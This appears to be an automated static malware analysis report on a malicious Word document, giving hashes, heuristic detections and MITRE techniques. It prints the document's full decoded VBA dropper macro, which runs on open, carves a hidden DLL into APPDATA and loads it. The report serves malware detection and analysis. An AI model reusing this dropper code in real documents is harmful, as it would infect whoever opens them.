Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2d10da5f2111faa8…

MALICIOUS

Office (OLE)

235.5 KB Created: 2019-09-26 10:30:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: 0484df9e5ed37ec4609247513076d069 SHA-1: 97dc4869051492872ee6cdeeeb5014e55c55455f SHA-256: 2d10da5f2111faa8390dd7c8ab573fb6c7dffcca1baf581ba04617754bce7102
438 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.005 Visual Basic

The sample contains VBA macros that trigger the Document_Open auto-execution macro. This macro utilizes CreateObject and Environ calls to prepare for the execution of an embedded PE executable. The critical heuristic firing for CVE-2007-3899 and the presence of an embedded executable strongly indicate exploitation of a memory corruption vulnerability for client execution.

Heuristics 13

  • CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899
    Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
  • OLE with Ole10Native — possible CVE-2026-21514 exploitation high CVE likely CVE_2026_21514
    Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation.
  • ClamAV: Xls.Malware.Sdrop-7173293-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Sdrop-7173293-0
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
            Set oApp = CreateObject("Shell.Application")
        oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("word\embeddings\oleObject1.bin")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
'ExecuteExcel4Macro "MESSAGE(False, ""Debug"")"
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    UserForm2.TextBox1.Tag = Environ("TEMP")
UserForm2.TextBox2.Tag = Environ("APPDATA")
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/officeDocument/2006/bibliography In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocIIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6936 bytes
SHA-256: 142362cb854c0d56495a6a73585fdbc0fc4cd7a967dc36b6d4e34e3afe6c70cd
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub Document_Open()
'ExecuteExcel4Macro "MESSAGE(False, ""Debug"")"

UserForm2.TextBox1.Tag = Environ("TEMP")
UserForm2.TextBox2.Tag = Environ("APPDATA")

ChDir (Environ("TEMP"))

    UserForm1.show
'ExecuteExcel4Macro "MESSAGE(False, ""Debug"")"
End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{C9361D3F-480F-4DC3-8EE4-BFA37B9C92EE}{D6B5A580-9C14-471B-8456-4B91218E41C7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Label1_Click()

End Sub

Private Sub UserForm_Activate()
DoEvents
ReplaceCurrentModule
End Sub

Private Sub UserForm_Initialize()
Call SystemButtonSettings(Me, False)

End Sub


Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{00BCEBE0-A3E2-49F9-9413-60F9607461DA}{05BDBA44-270A-4030-AFFC-1BD762CA3832}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module1"
#If Win64 Then
    Public Declare PtrSafe Function SuS Lib _
        "{3C5E6FB6-5406-4487-A499-11247618EE9A}2.dll" () As Integer
    Public Declare PtrSafe Function SuS2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
#Else
   Public Declare Function SuS2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
     Public Declare Function SuS Lib _
        "{3C5E6FB6-5406-4487-A499-11247618EE9A}1.dll" () As Integer
#End If
        



Attribute VB_Name = "Module2"
Private Const GWL_STYLE = -16
Private Const WS_CAPTION = &HC00000
Private Const WS_SYSMENU = &H80000

#If VBA7 Then

    Private Declare PtrSafe Function GetWindowLong _
        Lib "user32" Alias "GetWindowLongA" (ByVal hWnd As Long, _
        ByVal nIndex As Long) As Long
    Private Declare PtrSafe Function SetWindowLong _
        Lib "user32" Alias "SetWindowLongA" (ByVal hWnd As Long, _
        ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
    Private Declare PtrSafe Function FindWindowA _
        Lib "user32" (ByVal lpClassName As String, _
        ByVal lpWindowName As String) As Long
    Private Declare PtrSafe Function DrawMenuBar _
        Lib "user32" (ByVal hWnd As Long) As Long
        
#Else

    Private Declare Function GetWindowLong _
        Lib "user32" Alias "GetWindowLongA" ( _
        ByVal hWnd As Long, ByVal nIndex As Long) As Long
    Private Declare Function SetWindowLong _
        Lib "user32" Alias "SetWindowLongA" ( _
        ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
    Private Declare Function FindWindowA _
        Lib "user32" (ByVal lpClassName As String, _
        ByVal lpWindowName As String) As Long
    Private Declare Function DrawMenuBar _
        Lib "user32" (ByVal hWnd As Long) As Long
  
#End If

Public Sub SystemButtonSettings(frm As Object, show As Boolean)
Dim windowStyle As Long
Dim windowHandle As Long

windowHandle = FindWindowA(vbNullString, frm.Caption)
windowStyle = GetWindowLong(windowHandle, GWL_STYLE)

If show = False Then

    SetWindowLong windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU)

Else

    SetWindowLong windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU)

End If

DrawMenuBar (windowHandle)

End Sub




Public Sub KillArray(ParamArray PathList() As Variant)
    On Error Resume Next
    For Each Key In PathList
        Kill Key
    Next Key
    On Error GoTo 0
End Sub




Public Sub Resoration(s As String, nm As String, fl As Long, num As Integer)
    Dim intFileNum As Long, bytTemp1 As Byte, bytTemp2 As Byte, bytTemp3 As Byte
    Dim DataArray() As Long

    ReDim DataArray(1 To fl)
    DataArray(1) = CByte(50 + 27)
    DataArray(2) = CByte(50 + 40)
    DataArray(3) = CByte(50 + 94)
    
    intFileNum = FreeFile
    Open s For Binary Access Read As intFileNum
    Dim cur As Integer
    cur = 1
    Do While Not EOF(intFileNum)
        Get intFileNum, , bytTemp1
        If bytTemp1 = DataArray(1) Then
           Get intFileNum, , bytTemp2
           If bytTemp2 = DataArray(2) Then
                Get intFileNum, , bytTemp3
                If bytTemp3 = DataArray(3) Then
                     If cur = num Then
                        For k = 4 To fl
                            Get intFileNum, , bytTemp1
                            DataArray(k) = bytTemp1
                            Next k
                         Exit Do
                     Else
                        cur = cur + 1
                     End If
                End If
           End If
        End If
    Loop
    Close intFileNum
    
    intFileNum = FreeFile
    Open nm For Binary Lock Read Write As #intFileNum
    For i = LBound(DataArray) To UBound(DataArray)
        Put #intFileNum, , CByte(DataArray(i))
    Next i

    Close #intFileNum
End Sub





Attribute VB_Name = "Module3"


Public Sub ReplaceCurrentModule()
    TempName = UserForm2.TextBox1.Tag & "\factory.docm"
    ZipName = TempName + ".zip"
    ZipFolder = UserForm2.TextBox1.Tag '& "\UnzTmp"
    Dim nm As String
    Dim size As Long
    Dim num As Integer
#If Win64 Then
    nm = UserForm2.TextBox2.Tag + "\{3C5E6FB6-5406-4487-A499-11247618EE9A}2.dll"
    size = 67584
    num = 2
#Else
    
    nm = UserForm2.TextBox2.Tag + "\{3C5E6FB6-5406-4487-A499-11247618EE9A}1.dll"
    size = 77824
    num = 1
#End If
        
        KillArray ZipFolder & "\oleObj" + "ect*.bin", ZipName, nm
        
    DoEvents
        'ThisDocument. .Sheets.Copy
        Application.DisplayAlerts = False
        ThisDocument.SaveAs2 TempName, FileFormat:=13
   ' DoEvents
    'ActiveWorkbook.Close
   ' DoEvents
        
        
        If Left$(Application.Version, 1) = "8" Then
    'Word 97
    WordBasic.CopyFile FileName:=TempName, _
            Directory:=ZipName
Else
    'Word 2000 and above
    WordBasic.CopyFileA FileName:=TempName, _
            Directory:=ZipName
 End If
    
        'FileCopy TempName, ZipName
        
        Set oApp = CreateObject("Shell.Application")
        oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("word\embeddings\oleObject1.bin")
        Resoration ZipFolder + "\oleObject1.bin", nm, size, num
        
        ChDir (UserForm2.TextBox2.Tag)
        No_SuS = SuS2(nm)
        SuS

End Sub
embedded_office_0000a6a9.exe embedded-pe Office MZ+PE at offset 0xA6A9 198487 bytes
SHA-256: f7aa313b6120a23c8799513757ba478a6a19c08739039799f41b5719f9dc7871
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1630943246/Ole10Native 154479 bytes
SHA-256: 6d7d8cb564a14e7a4b4b1a6d92dac0dee6edf8099bb75370bc011d8076f13397

Open this report in the interactive analyzer, or submit your own file for analysis.